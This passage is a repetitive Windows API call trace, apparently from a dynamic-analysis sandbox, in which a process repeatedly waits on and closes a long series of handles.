returned 1 [0165.022] WaitForSingleObject (hHandle=0x8c4, dwMilliseconds=0xffffffff) returned 0x0 [0165.022] CloseHandle (hObject=0x8c4) returned 1 [0165.022] GetCurrentThreadId () returned 0x2ec [0165.022] GetCurrentThreadId () returned 0x2ec [0165.022] GetCurrentThreadId () returned 0x2ec [0165.022] GetCurrentThreadId () returned 0x2ec [0165.022] GetHandleInformation (in: hObject=0x8d8, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.022] WaitForSingleObject (hHandle=0x8d8, dwMilliseconds=0xffffffff) returned 0x0 [0165.022] CloseHandle (hObject=0x8d8) returned 1 [0165.022] GetCurrentThreadId () returned 0x2ec [0165.022] GetCurrentThreadId () returned 0x2ec [0165.022] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetHandleInformation (in: hObject=0x8ec, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.023] WaitForSingleObject (hHandle=0x8ec, dwMilliseconds=0xffffffff) returned 0x0 [0165.023] CloseHandle (hObject=0x8ec) returned 1 [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetHandleInformation (in: hObject=0x900, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.023] WaitForSingleObject (hHandle=0x900, dwMilliseconds=0xffffffff) returned 0x0 [0165.023] CloseHandle (hObject=0x900) returned 1 [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetHandleInformation (in: hObject=0x914, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.023] WaitForSingleObject (hHandle=0x914, dwMilliseconds=0xffffffff) returned 0x0 [0165.023] CloseHandle (hObject=0x914) returned 1 [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetHandleInformation (in: hObject=0x928, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.023] WaitForSingleObject (hHandle=0x928, dwMilliseconds=0xffffffff) returned 0x0 [0165.023] CloseHandle (hObject=0x928) returned 1 [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetHandleInformation (in: hObject=0x93c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.023] WaitForSingleObject (hHandle=0x93c, dwMilliseconds=0xffffffff) returned 0x0 [0165.023] CloseHandle (hObject=0x93c) returned 1 [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetHandleInformation (in: hObject=0x950, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.023] WaitForSingleObject (hHandle=0x950, dwMilliseconds=0xffffffff) returned 0x0 [0165.023] CloseHandle (hObject=0x950) returned 1 [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetCurrentThreadId () returned 0x2ec [0165.023] GetHandleInformation (in: hObject=0x964, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.024] WaitForSingleObject (hHandle=0x964, dwMilliseconds=0xffffffff) returned 0x0 [0165.024] CloseHandle (hObject=0x964) returned 1 [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetHandleInformation (in: hObject=0x978, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.024] WaitForSingleObject (hHandle=0x978, dwMilliseconds=0xffffffff) returned 0x0 [0165.024] CloseHandle (hObject=0x978) returned 1 [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetHandleInformation (in: hObject=0x98c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.024] WaitForSingleObject (hHandle=0x98c, dwMilliseconds=0xffffffff) returned 0x0 [0165.024] CloseHandle (hObject=0x98c) returned 1 [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetHandleInformation (in: hObject=0x9a0, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.024] WaitForSingleObject (hHandle=0x9a0, dwMilliseconds=0xffffffff) returned 0x0 [0165.024] CloseHandle (hObject=0x9a0) returned 1 [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetHandleInformation (in: hObject=0x9b4, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.024] WaitForSingleObject (hHandle=0x9b4, dwMilliseconds=0xffffffff) returned 0x0 [0165.024] CloseHandle (hObject=0x9b4) returned 1 [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetHandleInformation (in: hObject=0x9c8, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.024] WaitForSingleObject (hHandle=0x9c8, dwMilliseconds=0xffffffff) returned 0x0 [0165.024] CloseHandle (hObject=0x9c8) returned 1 [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetCurrentThreadId () returned 0x2ec [0165.024] GetHandleInformation (in: hObject=0x9dc, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.024] WaitForSingleObject (hHandle=0x9dc, dwMilliseconds=0xffffffff) returned 0x0 [0165.024] CloseHandle (hObject=0x9dc) returned 1 [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetHandleInformation (in: hObject=0x9f0, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.025] WaitForSingleObject (hHandle=0x9f0, dwMilliseconds=0xffffffff) returned 0x0 [0165.025] CloseHandle (hObject=0x9f0) returned 1 [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetHandleInformation (in: hObject=0xa04, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.025] WaitForSingleObject (hHandle=0xa04, dwMilliseconds=0xffffffff) returned 0x0 [0165.025] CloseHandle (hObject=0xa04) returned 1 [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetHandleInformation (in: hObject=0xa18, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.025] WaitForSingleObject (hHandle=0xa18, dwMilliseconds=0xffffffff) returned 0x0 [0165.025] CloseHandle (hObject=0xa18) returned 1 [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetHandleInformation (in: hObject=0xa2c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.025] WaitForSingleObject (hHandle=0xa2c, dwMilliseconds=0xffffffff) returned 0x0 [0165.025] CloseHandle (hObject=0xa2c) returned 1 [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetHandleInformation (in: hObject=0xa40, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.025] WaitForSingleObject (hHandle=0xa40, dwMilliseconds=0xffffffff) returned 0x0 [0165.025] CloseHandle (hObject=0xa40) returned 1 [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetHandleInformation (in: hObject=0xa54, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.025] WaitForSingleObject (hHandle=0xa54, dwMilliseconds=0xffffffff) returned 0x0 [0165.025] CloseHandle (hObject=0xa54) returned 1 [0165.025] GetCurrentThreadId () returned 0x2ec [0165.025] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetHandleInformation (in: hObject=0xa68, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.026] WaitForSingleObject (hHandle=0xa68, dwMilliseconds=0xffffffff) returned 0x0 [0165.026] CloseHandle (hObject=0xa68) returned 1 [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetHandleInformation (in: hObject=0xa7c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.026] WaitForSingleObject (hHandle=0xa7c, dwMilliseconds=0xffffffff) returned 0x0 [0165.026] CloseHandle (hObject=0xa7c) returned 1 [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetHandleInformation (in: hObject=0xa90, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.026] WaitForSingleObject (hHandle=0xa90, dwMilliseconds=0xffffffff) returned 0x0 [0165.026] CloseHandle (hObject=0xa90) returned 1 [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetHandleInformation (in: hObject=0xaa4, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.026] WaitForSingleObject (hHandle=0xaa4, dwMilliseconds=0xffffffff) returned 0x0 [0165.026] CloseHandle (hObject=0xaa4) returned 1 [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetHandleInformation (in: hObject=0xab8, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.026] WaitForSingleObject (hHandle=0xab8, dwMilliseconds=0xffffffff) returned 0x0 [0165.026] CloseHandle (hObject=0xab8) returned 1 [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetHandleInformation (in: hObject=0xacc, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.026] WaitForSingleObject (hHandle=0xacc, dwMilliseconds=0xffffffff) returned 0x0 [0165.026] CloseHandle (hObject=0xacc) returned 1 [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.026] GetCurrentThreadId () returned 0x2ec [0165.027] GetHandleInformation (in: hObject=0xae0, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.027] WaitForSingleObject (hHandle=0xae0, dwMilliseconds=0xffffffff) returned 0x0 [0165.027] CloseHandle (hObject=0xae0) returned 1 [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetHandleInformation (in: hObject=0xaf4, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.027] WaitForSingleObject (hHandle=0xaf4, dwMilliseconds=0xffffffff) returned 0x0 [0165.027] CloseHandle (hObject=0xaf4) returned 1 [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetHandleInformation (in: hObject=0xb08, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.027] WaitForSingleObject (hHandle=0xb08, dwMilliseconds=0xffffffff) returned 0x0 [0165.027] CloseHandle (hObject=0xb08) returned 1 [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetHandleInformation (in: hObject=0xb1c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.027] WaitForSingleObject (hHandle=0xb1c, dwMilliseconds=0xffffffff) returned 0x0 [0165.027] CloseHandle (hObject=0xb1c) returned 1 [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetHandleInformation (in: hObject=0xb30, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.027] WaitForSingleObject (hHandle=0xb30, dwMilliseconds=0xffffffff) returned 0x0 [0165.027] CloseHandle (hObject=0xb30) returned 1 [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetHandleInformation (in: hObject=0xb44, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.027] WaitForSingleObject (hHandle=0xb44, dwMilliseconds=0xffffffff) returned 0x0 [0165.027] CloseHandle (hObject=0xb44) returned 1 [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetCurrentThreadId () returned 0x2ec [0165.027] GetHandleInformation (in: hObject=0xb58, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.027] WaitForSingleObject (hHandle=0xb58, dwMilliseconds=0xffffffff) returned 0x0 [0165.028] CloseHandle (hObject=0xb58) returned 1 [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetHandleInformation (in: hObject=0xb6c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.028] WaitForSingleObject (hHandle=0xb6c, dwMilliseconds=0xffffffff) returned 0x0 [0165.028] CloseHandle (hObject=0xb6c) returned 1 [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetHandleInformation (in: hObject=0xb80, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.028] WaitForSingleObject (hHandle=0xb80, dwMilliseconds=0xffffffff) returned 0x0 [0165.028] CloseHandle (hObject=0xb80) returned 1 [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetHandleInformation (in: hObject=0xb94, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.028] WaitForSingleObject (hHandle=0xb94, dwMilliseconds=0xffffffff) returned 0x0 [0165.028] CloseHandle (hObject=0xb94) returned 1 [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetHandleInformation (in: hObject=0xba8, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.028] WaitForSingleObject (hHandle=0xba8, dwMilliseconds=0xffffffff) returned 0x0 [0165.028] CloseHandle (hObject=0xba8) returned 1 [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetHandleInformation (in: hObject=0xbbc, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.028] WaitForSingleObject (hHandle=0xbbc, dwMilliseconds=0xffffffff) returned 0x0 [0165.028] CloseHandle (hObject=0xbbc) returned 1 [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetCurrentThreadId () returned 0x2ec [0165.028] GetHandleInformation (in: hObject=0xbd0, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.028] WaitForSingleObject (hHandle=0xbd0, dwMilliseconds=0xffffffff) returned 0x0 [0165.028] CloseHandle (hObject=0xbd0) returned 1 [0165.029] GetCurrentThreadId () returned 0x2ec [0165.029] GetCurrentThreadId () returned 0x2ec [0165.029] GetCurrentThreadId () returned 0x2ec [0165.029] GetCurrentThreadId () returned 0x2ec [0165.029] GetHandleInformation (in: hObject=0xbe4, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.029] WaitForSingleObject (hHandle=0xbe4, dwMilliseconds=0xffffffff) returned 0x0 [0165.029] CloseHandle (hObject=0xbe4) returned 1 [0165.029] GetCurrentThreadId () returned 0x2ec [0165.029] GetCurrentThreadId () returned 0x2ec [0165.029] GetCurrentThreadId () returned 0x2ec [0165.029] GetCurrentThreadId () returned 0x2ec [0165.029] GetHandleInformation (in: hObject=0xbf8, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.029] WaitForSingleObject (hHandle=0xbf8, dwMilliseconds=0xffffffff) returned 0x0 [0165.029] CloseHandle (hObject=0xbf8) returned 1 [0165.029] GetCurrentThreadId () returned 0x2ec [0165.029] GetCurrentThreadId () returned 0x2ec [0165.029] GetCurrentThreadId () returned 0x2ec [0165.029] GetCurrentThreadId () returned 0x2ec [0165.029] GetHandleInformation (in: hObject=0xc10, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0165.029] WaitForSingleObject (hHandle=0xc10, dwMilliseconds=0xffffffff) returned 0x0 [0165.029] CloseHandle (hObject=0xc10) returned 1 [0165.029] GetCurrentThreadId () returned 0x2ec [0165.029] GetCurrentThreadId () returned 0x2ec [0165.029] WaitForSingleObject (hHandle=0xc24, dwMilliseconds=0xffffffff) returned 0x0 [0165.029] CloseHandle (hObject=0xc24) returned 1 [0165.029] WaitForSingleObject (hHandle=0xc38, dwMilliseconds=0xffffffff) returned 0x0 [0165.029] CloseHandle (hObject=0xc38) returned 1 [0165.029] WaitForSingleObject (hHandle=0xc4c, dwMilliseconds=0xffffffff) returned 0x0 [0165.029] CloseHandle (hObject=0xc4c) returned 1 [0165.029] WaitForSingleObject (hHandle=0xc60, dwMilliseconds=0xffffffff) returned 0x0 [0165.029] CloseHandle (hObject=0xc60) returned 1 [0165.029] WaitForSingleObject (hHandle=0xc74, dwMilliseconds=0xffffffff) returned 0x0 [0165.029] CloseHandle (hObject=0xc74) returned 1 [0165.030] WaitForSingleObject (hHandle=0xc88, dwMilliseconds=0xffffffff) returned 0x0 [0165.030] CloseHandle (hObject=0xc88) returned 1 [0165.030] WaitForSingleObject (hHandle=0xc9c, dwMilliseconds=0xffffffff) returned 0x0 [0165.030] CloseHandle (hObject=0xc9c) returned 1 [0165.030] WaitForSingleObject (hHandle=0xcb0, dwMilliseconds=0xffffffff) returned 0x0 [0165.030] CloseHandle (hObject=0xcb0) returned 1 [0165.030] WaitForSingleObject (hHandle=0xcc4, dwMilliseconds=0xffffffff) returned 0x0 [0165.030] CloseHandle (hObject=0xcc4) returned 1 [0165.030] WaitForSingleObject (hHandle=0xcd8, dwMilliseconds=0xffffffff) returned 0x0 [0165.030] CloseHandle (hObject=0xcd8) returned 1 [0165.030] WaitForSingleObject (hHandle=0xcec, dwMilliseconds=0xffffffff) returned 0x0 [0165.030] CloseHandle (hObject=0xcec) returned 1 [0165.030] WaitForSingleObject (hHandle=0xd00, dwMilliseconds=0xffffffff) returned 0x0 [0165.030] CloseHandle (hObject=0xd00) returned 1 [0165.030] WaitForSingleObject (hHandle=0xd14, dwMilliseconds=0xffffffff) returned 0x0 [0165.030] CloseHandle (hObject=0xd14) returned 1 [0165.030] WaitForSingleObject (hHandle=0xd28, dwMilliseconds=0xffffffff) returned 0x0 [0165.030] CloseHandle (hObject=0xd28) returned 1 [0165.030] WaitForSingleObject (hHandle=0xd3c, dwMilliseconds=0xffffffff) returned 0x0 [0165.030] CloseHandle (hObject=0xd3c) returned 1 [0165.030] WaitForSingleObject (hHandle=0xd50, dwMilliseconds=0xffffffff) returned 0x0 [0165.030] CloseHandle (hObject=0xd50) returned 1 [0165.031] WaitForSingleObject (hHandle=0xd64, dwMilliseconds=0xffffffff) returned 0x0 [0165.031] CloseHandle (hObject=0xd64) returned 1 [0165.031] WaitForSingleObject (hHandle=0xd78, dwMilliseconds=0xffffffff) returned 0x0 [0165.229] CloseHandle (hObject=0xd78) returned 1 [0165.229] WaitForSingleObject (hHandle=0xd8c, dwMilliseconds=0xffffffff) returned 0x0 [0165.229] CloseHandle (hObject=0xd8c) returned 1 [0165.229] WaitForSingleObject (hHandle=0xda0, dwMilliseconds=0xffffffff) returned 0x0 [0165.229] CloseHandle (hObject=0xda0) returned 1 [0165.229] WaitForSingleObject (hHandle=0xdb4, dwMilliseconds=0xffffffff) returned 0x0 [0165.229] CloseHandle (hObject=0xdb4) returned 1 [0165.229] WaitForSingleObject (hHandle=0xdc8, dwMilliseconds=0xffffffff) returned 0x0 [0165.229] CloseHandle (hObject=0xdc8) returned 1 [0165.229] WaitForSingleObject (hHandle=0xddc, dwMilliseconds=0xffffffff) returned 0x0 [0165.229] CloseHandle (hObject=0xddc) returned 1 [0165.229] WaitForSingleObject (hHandle=0xdf0, dwMilliseconds=0xffffffff) returned 0x0 [0165.229] CloseHandle (hObject=0xdf0) returned 1 [0165.230] WaitForSingleObject (hHandle=0xe04, dwMilliseconds=0xffffffff) returned 0x0 [0165.230] CloseHandle (hObject=0xe04) returned 1 [0165.230] WaitForSingleObject (hHandle=0xe18, dwMilliseconds=0xffffffff) returned 0x0 [0165.230] CloseHandle (hObject=0xe18) returned 1 [0165.230] WaitForSingleObject (hHandle=0xe2c, dwMilliseconds=0xffffffff) returned 0x0 [0165.230] CloseHandle (hObject=0xe2c) returned 1 [0165.230] WaitForSingleObject (hHandle=0xe40, dwMilliseconds=0xffffffff) returned 0x0 [0165.230] CloseHandle (hObject=0xe40) returned 1 [0165.230] WaitForSingleObject (hHandle=0xe54, dwMilliseconds=0xffffffff) returned 0x0 [0165.230] CloseHandle (hObject=0xe54) returned 1 [0165.230] WaitForSingleObject (hHandle=0xe68, dwMilliseconds=0xffffffff) returned 0x0 [0165.230] CloseHandle (hObject=0xe68) returned 1 [0165.230] WaitForSingleObject (hHandle=0xe7c, dwMilliseconds=0xffffffff) returned 0x0 [0165.230] CloseHandle (hObject=0xe7c) returned 1 [0165.230] WaitForSingleObject (hHandle=0xe90, dwMilliseconds=0xffffffff) returned 0x0 [0165.230] CloseHandle (hObject=0xe90) returned 1 [0165.230] WaitForSingleObject (hHandle=0xea4, dwMilliseconds=0xffffffff) returned 0x0 [0165.230] CloseHandle (hObject=0xea4) returned 1 [0165.230] WaitForSingleObject (hHandle=0xeb8, dwMilliseconds=0xffffffff) returned 0x0 [0165.230] CloseHandle (hObject=0xeb8) returned 1 [0165.230] WaitForSingleObject (hHandle=0xecc, dwMilliseconds=0xffffffff) returned 0x0 [0165.230] CloseHandle (hObject=0xecc) returned 1 [0165.231] WaitForSingleObject (hHandle=0xee0, dwMilliseconds=0xffffffff) returned 0x0 [0165.231] CloseHandle (hObject=0xee0) returned 1 [0165.231] WaitForSingleObject (hHandle=0xef4, dwMilliseconds=0xffffffff) returned 0x0 [0165.231] CloseHandle (hObject=0xef4) returned 1 [0165.231] WaitForSingleObject (hHandle=0xf08, dwMilliseconds=0xffffffff) returned 0x0 [0165.231] CloseHandle (hObject=0xf08) returned 1 [0165.231] WaitForSingleObject (hHandle=0xf1c, dwMilliseconds=0xffffffff) returned 0x0 [0165.231] CloseHandle (hObject=0xf1c) returned 1 [0165.231] WaitForSingleObject (hHandle=0xf30, dwMilliseconds=0xffffffff) returned 0x0 [0165.231] CloseHandle (hObject=0xf30) returned 1 [0165.231] WaitForSingleObject (hHandle=0xf44, dwMilliseconds=0xffffffff) returned 0x0 [0165.231] CloseHandle (hObject=0xf44) returned 1 [0165.231] WaitForSingleObject (hHandle=0xf58, dwMilliseconds=0xffffffff) returned 0x0 [0165.231] CloseHandle (hObject=0xf58) returned 1 [0165.231] WaitForSingleObject (hHandle=0xf6c, dwMilliseconds=0xffffffff) returned 0x0 [0165.231] CloseHandle (hObject=0xf6c) returned 1 [0165.231] WaitForSingleObject (hHandle=0xf80, dwMilliseconds=0xffffffff) returned 0x0 [0165.231] CloseHandle (hObject=0xf80) returned 1 [0165.231] WaitForSingleObject (hHandle=0xf94, dwMilliseconds=0xffffffff) returned 0x0 [0165.231] CloseHandle (hObject=0xf94) returned 1 [0165.231] WaitForSingleObject (hHandle=0xfa8, dwMilliseconds=0xffffffff) returned 0x0 [0165.231] CloseHandle (hObject=0xfa8) returned 1 [0165.232] WaitForSingleObject (hHandle=0xfbc, dwMilliseconds=0xffffffff) returned 0x0 [0165.232] CloseHandle (hObject=0xfbc) returned 1 [0165.232] WaitForSingleObject (hHandle=0xfd0, dwMilliseconds=0xffffffff) returned 0x0 [0165.232] CloseHandle (hObject=0xfd0) returned 1 [0165.232] WaitForSingleObject (hHandle=0xfe4, dwMilliseconds=0xffffffff) returned 0x0 [0165.232] CloseHandle (hObject=0xfe4) returned 1 [0165.232] WaitForSingleObject (hHandle=0xff8, dwMilliseconds=0xffffffff) returned 0x0 [0165.232] CloseHandle (hObject=0xff8) returned 1 [0165.232] WaitForSingleObject (hHandle=0x1010, dwMilliseconds=0xffffffff) returned 0x0 [0165.232] CloseHandle (hObject=0x1010) returned 1 [0165.232] WaitForSingleObject (hHandle=0x1024, dwMilliseconds=0xffffffff) returned 0x0 [0165.232] CloseHandle (hObject=0x1024) returned 1 [0165.232] WaitForSingleObject (hHandle=0x1038, dwMilliseconds=0xffffffff) returned 0x0 [0165.232] CloseHandle (hObject=0x1038) returned 1 [0165.232] WaitForSingleObject (hHandle=0x104c, dwMilliseconds=0xffffffff) returned 0x0 [0165.232] CloseHandle (hObject=0x104c) returned 1 [0165.232] WaitForSingleObject (hHandle=0x1060, dwMilliseconds=0xffffffff) returned 0x0 [0165.232] CloseHandle (hObject=0x1060) returned 1 [0165.232] WaitForSingleObject (hHandle=0x1074, dwMilliseconds=0xffffffff) returned 0x0 [0165.232] CloseHandle (hObject=0x1074) returned 1 [0165.232] WaitForSingleObject (hHandle=0x1088, dwMilliseconds=0xffffffff) returned 0x0 [0165.232] CloseHandle (hObject=0x1088) returned 1 [0165.232] WaitForSingleObject (hHandle=0x109c, dwMilliseconds=0xffffffff) returned 0x0 [0165.233] CloseHandle (hObject=0x109c) returned 1 [0165.233] WaitForSingleObject (hHandle=0x10b0, dwMilliseconds=0xffffffff) returned 0x0 [0165.233] CloseHandle (hObject=0x10b0) returned 1 [0165.233] WaitForSingleObject (hHandle=0x10c4, dwMilliseconds=0xffffffff) returned 0x0 [0165.233] CloseHandle (hObject=0x10c4) returned 1 [0165.233] WaitForSingleObject (hHandle=0x10d8, dwMilliseconds=0xffffffff) returned 0x0 [0165.233] CloseHandle 